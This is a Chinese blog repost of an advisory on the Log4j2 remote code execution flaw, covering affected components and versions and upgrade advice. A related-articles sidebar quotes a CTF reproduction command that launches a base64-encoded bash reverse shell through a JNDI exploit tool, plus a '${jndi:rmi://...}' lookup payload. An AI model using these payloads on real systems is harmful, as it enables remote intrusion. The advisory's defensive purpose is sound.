Log4j2 重大漏洞!上万个项目中枪...

最新推荐文章于 2024-04-16 07:48:07 发布
最新推荐文章于 2024-04-16 07:48:07 发布
阅读量251 收藏
点赞数
文章标签: java spring 安全 大数据 log4j
原文链接:https://mp.weixin.qq.com/s?__biz=MzI5MzYzMDAwNw==&mid=2247496917&idx=1&sn=47ca7b72b2ff0e5e5833e9f967bfaa5d&chksm=ec6d8d8ddb1a049b618c046cacc386f5e24123cc285f6f7f016930d970b037ecf46315181d25&scene=126&&sessionid=0
版权

大家好,我是 乔戈里。今天一大早就看到群里有小伙伴说 Log4j2 的远程代码执行漏洞的事情,在这里再提示一下,以防有小伙伴还没有看到。

2133e5adf371850ade43beff838bd48f.png ebfe44a2ac5ea272971fa94c4be91ddf.png

Apache 这次又要背锅了,这漏洞的影响范围太广(绝大部分公司都会受影响),又是一个可以载入历史的漏洞。

漏洞描述

Apache Log4j2 是一款优秀的 Java 日志框架。2021 年 11 月 24 日,阿里云安全团队向 Apache 官方报告了 Apache Log4j2 远程代码执行漏洞。由于 Apache Log4j2 某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。

由于 Log4j2 作为日志记录基础第三方库,被大量 Java 框架及应用使用,只要用到 Log4j2 进行日志输出且日志内容能被攻击者部分可控,即可能会受到漏洞攻击影响。因此,该漏洞也同时影响全球大量通用应用及组件,例如:

  • Apache Struts2

  • Apache Solr

  • Apache Druid

  • Apache Flink

  • Apache Flume

  • Apache Dubbo

  • Apache Kafka

  • Spring-boot-starter-log4j2

  • ElasticSearch

  • Redis

  • Logstash

建议及时检查并升级所有使用了 Log4j 组件的系统或应用。

漏洞评级

Apache Log4j 远程代码执行漏洞,严重!

63a687d3972018cb7e900faeb2722ecf.png

金山毒霸直接把这次漏洞等级设置为了最高级。

8b333b9eecd43e98230ed51e742564da.png

影响版本

经验证 2.15.0-rc1 版本存在绕过,实际受影响范围如下:

Apache Log4j 2.x < 2.15.0-rc2

安全建议

1、排查应用是否引入了 Apache log4j-core Jar 包,若存在依赖引入,且在受影响版本范围内,则可能存在漏洞影响。请尽快升级 Apache Log4j2 所有相关应用到最新的 log4j-2.15.0-rc2 版本,地址 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

2、升级已知受影响的应用及组件,如 spring-boot-starter-log4j2/Apache Struts2/Apache Solr/Apache Druid/Apache Flink

3、可升级 jdk 版本至 6u211 / 7u201 / 8u191 / 11.0.1 以上,可以在一定程度上限制 JNDI 等漏洞利用方式。

相关链接

1、https://github.com/apache/logging-log4j2

2、https://issues.apache.org/jira/projects/LOG4J2/issues/LOG4J2-3201?filter=allissues

············  END  ··············

程序员乔戈里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 7811
log4j漏洞原理和靶场复现
分析Apache Log4j2 远程代码执行漏洞_log4j2漏洞2,2024年最新网络安全性能优化最佳实践
最新发布
2401_83739777的博客
04-16 1241
Log4j是Apache的一个开源项目,通过使用Log4j,可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;Apache Log4j2Log4j的升级版本,据分析,该漏洞产生的原因在于Log4j在记录日志的过程中会对日志内容进行判断,如果内容中包含了${,则Log4j会认为此字符属于可替换的变量,并且Log4j支持JNDI远程加载的方式替换变量值。
JAVA安全--log4j漏洞研究分析
goddemon
03-12 9918
log4j漏洞复现 复现 这里以bugku上的靶场为例进行复现 https://ctf.bugku.com/challenges/detail/id/340.html 环境配置 ①ldap服务 服务器起一个ldap服务就好了 直接执行反弹shell 即直接配置bash反弹shell命令 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTYuM
log4j漏洞分析及总结
热门推荐
csd_ct的专栏
02-14 4万+
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。 漏洞描述及影响 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。
Log4j高危漏洞原理及复现
qq_51302564的博客
12-15 1万+
Log4j高危漏洞原理及复现 漏洞检测||复现环境 查看JDK版本,发现版本小于1.8u121 图3-7 查看JDK版本 查看log4j2版本,发现版本在2.x <= 2.14.1内 图3-8 查看log4j2版本 查看代码,发现存在log4j2相关的lookup语句 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-w9LtKVys-1639577266999)(C:\Users\BLACKF~1\AppData\Local\Temp\ksohtml\wps3AFF.
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
LOG4J RCE 漏洞分享与自查.pdf
12-15
Log4j RCE 漏洞是近期爆发的一种高危漏洞,它影响了全球许多业务线,原因在于引入的 Log4j2 2.10.0 版本中存在的漏洞。本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决方案。 漏洞原因: Log4j ...
详解Javalog4j.properties配置与加载应用
08-28
Log4j 是 Apache的一个开放源代码项目,通过使用 Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI 组件、甚至是套接口服务器、NT 的事件记录器、UNIX Syslog 守护进程等;我们也可以控制每一条日志的...
log4j2.xml
12-18
1)log4j2的配置文件,支持单独输出debug、info、warn、error文件 2)自动打包,按照日期、月份单独打包 3)自动压缩,历史日志被压缩,节省空间
tomcat9 slf4j+log4j2 写日志.zip
12-27
1. **添加依赖**:确保你的项目中包含SLF4J和Log4j2的依赖库。在Maven的pom.xml文件中,你可以添加以下依赖: ```xml <groupId>org.slf4j <artifactId>slf4j-api <version>1.7.x <groupId>org.apache....
Log4j2.x架构Java开发Java经验技巧共8页.p
11-25
在"Log4j2.x架构Java开发Java经验技巧共8页.pdf.zip"这个压缩包中,我们可能找到了关于如何高效利用Log4j2.x进行Java开发的一些实用技巧和深入理解。 首先,Log4j2.x的架构设计十分灵活,它允许开发者自定义日志...
Apache Log4j2紧急缓解措施.docx
12-16
Apache Log4j2 是一个流行的 Java 日志记录工具,但最近出现了严重的安全漏洞, Apache Log4j2 紧急缓解措施旨在帮助开发者尽快修复该漏洞,避免攻击者的攻击。 一、修改启动脚本 在启动 Java 应用程序时,添加一...
Log4J2远程代码执行漏洞修复20211210.rar
12-13
1. 下载并替换:将项目中现有的Log4J2库文件替换为提供的`log4j-api-2.15.0.jar`、`log4j-core-2.15.0.jar`和`log4j-jcl-2.15.0.jar`文件。 2. 配置更新:在Log4J2的配置文件(如`log4j2.xml`或`log4j2.json`)中...
log4j漏洞详解
weixin_61638307的博客
03-21 3898
JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,举个例子:它就相当于的你的一个秘书,用了一些手段,你可以去指使他去干一些事情,这个手段就是lookup(),相当于你给秘书一个目标。先给这些名词简单说一下Ldap:你可以将它理解为一个目标数据库。
手把手教你复现Log4j2漏洞,千万别中招!
Java知音
12-13 2181
点击关注公众号,实用技术文章及时了解来源:blog.csdn.net/qq_40989258/article/details/1218623630x00 简介ApacheLog4j2是一个...
Log4j漏洞分析
a1290320893的博客
12-13 2598
先看问题: 原本我只是希望logger.info(“hello,{}”,message); 用message来替换{}输出:hello,pxq; 但是假如我的message是${java:os},就是输出设备的具体信息;像这种可能存在隐患; 进一步如果String strings = “${jndi:rmi://127.0.0.1:1899/asd}”; 就会去执行注册中心127.0.0.1:1899中的名为asd的服务,只要用户使用了logger.info()且版本在log4j-api的版本在2.14.0
使用js计算1!+!2+...+10!
03-31
要计算1!+2!+...+10!,我们可以使用JavaScript编写一个循环来实现。首先,让我给你介绍一下阶乘的概念。 阶乘是指从1乘到一个给定的正整数的连乘积。例如,5的阶乘表示为5!,计算方式为5 × 4 × 3 × 2 × 1 = 120。 现在,我们可以使用循环来计算1!+2!+...+10!的结果。以下是JavaScript代码示例: ```javascript // 定义一个变量来保存结果 let sum = 0; // 循环计算每个数的阶乘并累加到结果中 for (let i = 1; i <= 10; i++) { let factorial = 1; // 计算当前数的阶乘 for (let j = 1; j <= i; j++) { factorial *= j; } // 将当前数的阶乘加到结果中 sum += factorial; } // 输出结果 console.log(sum); ``` 运行以上代码,你将得到1!+2!+...+10!的结果。在这个例子中,结果为4037913。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值